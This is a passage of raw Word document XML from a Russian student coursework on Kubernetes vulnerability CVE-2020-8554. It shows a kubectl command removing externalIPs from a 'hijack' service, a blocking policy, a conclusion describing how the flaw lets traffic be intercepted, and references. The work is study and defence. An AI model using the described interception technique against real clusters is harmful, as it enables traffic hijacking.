        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">были созданы, то их необходимо удалить новым обновлением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3FE25" w14:textId="154254E2" w:rsidR="00AD2B74" w:rsidRDefault="00AD2B74" w:rsidP="00AD2B74">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kubectl -n tenant-b patch service hijack-external-api \</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>--type=merge \</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p '{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"spec</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"externalIPs</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":null</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}}' \</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>--as=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>system:serviceaccount</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:security-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin:security</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AD2B74">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395B240F" w14:textId="7D323D62" w:rsidR="00AD2B74" w:rsidRDefault="00AD2B74" w:rsidP="00AD2B74">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Где во флаге </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD2B74">
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> указан аккаунт администратора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E96F15E" w14:textId="626AAEED" w:rsidR="00193999" w:rsidRDefault="00B54BFC" w:rsidP="00AD2B74">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сама политика описывается в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54BFC">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>файле.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835BCE9" w14:textId="560707AD" w:rsidR="00B54BFC" w:rsidRDefault="00B54BFC" w:rsidP="00B54BFC">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r w:rsidRPr="00B54BFC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66BE4C11" wp14:editId="3F353AF6">
            <wp:extent cx="6480175" cy="2988945"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="181222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210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DF94" w14:textId="77FFEBEF" w:rsidR="00B54BFC" w:rsidRDefault="00B54BFC" w:rsidP="00B54BFC">
      <w:pPr>
        <w:pStyle w:val="-"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Создание политики запрета </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D6393A" w14:textId="77777777" w:rsidR="00A01C60" w:rsidRDefault="00A01C60" w:rsidP="00A01C60">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40A7AEC8" w14:textId="551C22E8" w:rsidR="00A01C60" w:rsidRDefault="00A01C60" w:rsidP="00A01C60">
      <w:r>
        <w:t xml:space="preserve">После ее применения, попытка создать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A01C60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>будет отклонена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE0F5FC" w14:textId="77777777" w:rsidR="00A01C60" w:rsidRDefault="00A01C60" w:rsidP="00A01C60"/>
    <w:p w14:paraId="04FC782D" w14:textId="6608E160" w:rsidR="00A01C60" w:rsidRDefault="00A01C60" w:rsidP="00A01C60">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
      <w:r w:rsidRPr="00A01C60">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DBAFDD5" wp14:editId="557E378E">
            <wp:extent cx="6480175" cy="670560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42741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135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16A8" w14:textId="2DDC5043" w:rsidR="00A01C60" w:rsidRPr="00A01C60" w:rsidRDefault="00A01C60" w:rsidP="00A01C60">
      <w:pPr>
        <w:pStyle w:val="-"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Блокировка создания </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIP</w:t>
      </w:r>
      <w:r w:rsidR="00311E8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A6C137" w14:textId="77777777" w:rsidR="00217172" w:rsidRPr="00AD2B74" w:rsidRDefault="00217172" w:rsidP="00CC77F3"/>
    <w:p w14:paraId="5DB6553D" w14:textId="77777777" w:rsidR="00B400B6" w:rsidRPr="00AD2B74" w:rsidRDefault="00B400B6" w:rsidP="00B400B6"/>
    <w:p w14:paraId="04DC17FD" w14:textId="77777777" w:rsidR="005329EA" w:rsidRPr="00AD2B74" w:rsidRDefault="005329EA" w:rsidP="005329EA"/>
    <w:p w14:paraId="041F2C4D" w14:textId="77777777" w:rsidR="005329EA" w:rsidRPr="00AD2B74" w:rsidRDefault="005329EA" w:rsidP="005329EA"/>
    <w:p w14:paraId="434E57FA" w14:textId="77777777" w:rsidR="005329EA" w:rsidRPr="00AD2B74" w:rsidRDefault="005329EA" w:rsidP="005329EA"/>
    <w:p w14:paraId="1C2B5CCD" w14:textId="77777777" w:rsidR="00614263" w:rsidRPr="00AD2B74" w:rsidRDefault="00614263" w:rsidP="00FF2D6B"/>
    <w:p w14:paraId="7D256B94" w14:textId="722A3A01" w:rsidR="006A05EA" w:rsidRPr="00AD2B74" w:rsidRDefault="006A05EA" w:rsidP="006A05EA">
      <w:pPr>
        <w:pStyle w:val="a"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E5C675" w14:textId="1D1040E1" w:rsidR="00015840" w:rsidRDefault="00015840">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1395C9F0" w14:textId="77777777" w:rsidR="00FF2D6B" w:rsidRPr="00AD2B74" w:rsidRDefault="00FF2D6B" w:rsidP="00015840">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283904D7" w14:textId="77777777" w:rsidR="00063C8F" w:rsidRPr="00137D84" w:rsidRDefault="00063C8F" w:rsidP="00015840">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc518292931"/>
      <w:bookmarkStart w:id="56" w:name="_Toc231834656"/>
      <w:r w:rsidRPr="00137D84">
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="26FD2E3D" w14:textId="596603B1" w:rsidR="00056C02" w:rsidRDefault="00C13EEC" w:rsidP="00592668">
      <w:pPr>
        <w:ind w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:t xml:space="preserve">ходе выполненной курсовой работы было проведено исследование уявзимости </w:t>
      </w:r>
      <w:r w:rsidR="00015840" w:rsidRPr="00757DB2">
        <w:t>CVE-2020-8554</w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:t xml:space="preserve"> в объекте </w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:t xml:space="preserve">. В теоретической части работы были рассмотрены основы оркестровки конейнеров, архитектура главной и рабочей ноды </w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:t xml:space="preserve">, также были рассмотрены все объекты развертывания </w:t>
      </w:r>
      <w:r w:rsidR="00015840">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:t xml:space="preserve">. Основное внимание было уделено анализу </w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITM</w:t>
      </w:r>
      <w:r w:rsidR="00281475" w:rsidRPr="00281475">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:t xml:space="preserve">уязвимостей и способам их реализации, а также защите от них. Способ реализации уязвимости и создание защиты были осуществлены на базе ОС </w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00281475" w:rsidRPr="00281475">
        <w:t xml:space="preserve"> 20.04 </w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:t xml:space="preserve">с использованием </w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>minikube</w:t>
      </w:r>
      <w:r w:rsidR="00281475" w:rsidRPr="00281475">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:t xml:space="preserve">для локального развертывания кластера внутри </w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00281475" w:rsidRPr="00281475">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:t xml:space="preserve">контейнера. Был реализован сценарий эксплуатации уязвимости, который на создании контейнера с произвольным содержимым на </w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00281475">
        <w:t xml:space="preserve"> адресе, который может быть использован для маршрутизации внутреннего трафика кластера, тем самым приведя к перехвату этого трафика.</w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:t xml:space="preserve"> В результате исследования было обнаружено, что для объекта </w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50" w:rsidRPr="00EB5F50">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50" w:rsidRPr="00EB5F50">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50" w:rsidRPr="00EB5F50">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:t xml:space="preserve">поле </w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spec</w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50" w:rsidRPr="00EB5F50">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidR="00EB5F50">
        <w:t xml:space="preserve"> может содержать </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t xml:space="preserve">адресс, который не находится под управлением </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t xml:space="preserve">и имеет вероятный </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITM</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t xml:space="preserve">блок. Далее была добавлена политика, запрещающая наличие поля </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spec</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t xml:space="preserve">у объектов </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t xml:space="preserve">внутри данного кластера. Повторная попытка добавления внешнего </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t xml:space="preserve">в поле </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>spec</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>externalIPs</w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t xml:space="preserve"> была пресечена ранее созданной политикой. Таким образом, уязвимость </w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00757DB2">
        <w:t>CVE-2020-8554</w:t>
      </w:r>
      <w:r w:rsidR="00761289" w:rsidRPr="00761289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00761289">
        <w:t>была исследована, практически продемонстрированна и был рассмотрен способ защиты от нее.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12144D8B" w14:textId="2FEF7D87" w:rsidR="00761289" w:rsidRDefault="00761289">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF6815" w14:textId="3B994654" w:rsidR="00761289" w:rsidRDefault="00761289" w:rsidP="00761289">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1140"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc231834657"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">список </w:t>
      </w:r>
      <w:r w:rsidR="000A1496">
        <w:t xml:space="preserve">использованных </w:t>
      </w:r>
      <w:r>
        <w:t>источников</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="470FC156" w14:textId="4674583B" w:rsidR="00761289" w:rsidRDefault="00761289" w:rsidP="00761289">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kubernetes documentation – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00E17FA2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://kubernetes.io/docs/home/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7F194BCE" w14:textId="45F54D15" w:rsidR="00761289" w:rsidRDefault="00761289" w:rsidP="00761289">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Minikube documentation – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00E17FA2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://minikube.sigs.k8s.io/docs/start/?arch=%2Fwindows%2Fx86-64%2Fstable%2F.exe+download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69B4782E" w14:textId="6B1B29E4" w:rsidR="00761289" w:rsidRDefault="000A1496" w:rsidP="00761289">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2020-8554 – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00E17FA2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/cve-2020-8554</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D7B454C" w14:textId="28A26BCA" w:rsidR="000A1496" w:rsidRPr="000A1496" w:rsidRDefault="000A1496" w:rsidP="000A1496">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub: </w:t>
      </w:r>
      <w:r w:rsidRPr="000A1496">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Man in the middle using LoadBalancer or ExternalIPs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00E17FA2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/kubernetes/kubernetes/issues/97076</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EF09E46" w14:textId="5CA09313" w:rsidR="000A1496" w:rsidRPr="000A1496" w:rsidRDefault="000A1496" w:rsidP="000A1496">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Datalog: </w:t>
      </w:r>
      <w:r w:rsidRPr="000A1496">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Unpatchable Vulnerabilities of Kubernetes: CVE-2020-8554</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00E17FA2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://securitylabs.datadoghq.com/articles/unpatchable-kubernetes-vulnerabilities-cve-2020-8554/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A1AE536" w14:textId="0D245757" w:rsidR="000A1496" w:rsidRPr="000A1496" w:rsidRDefault="000A1496" w:rsidP="000A1496">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580BBA1D" w14:textId="77777777" w:rsidR="000A1496" w:rsidRPr="000A1496" w:rsidRDefault="000A1496" w:rsidP="000A1496">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB29309" w14:textId="0FF4B807" w:rsidR="000A1496" w:rsidRPr="000A1496" w:rsidRDefault="000A1496" w:rsidP="000A1496">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CE06B6" w14:textId="1D1E24CA" w:rsidR="000A1496" w:rsidRPr="00761289" w:rsidRDefault="000A1496" w:rsidP="000A1496">
      <w:pPr>
        <w:pStyle w:val="-1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E395F4" w14:textId="77777777" w:rsidR="00CE5BEB" w:rsidRPr="00761289" w:rsidRDefault="00CE5BEB">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc518292932"/>
      <w:r w:rsidRPr="00761289">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7917CB" w14:textId="1404F4CB" w:rsidR="000C3012" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc231834658"/>
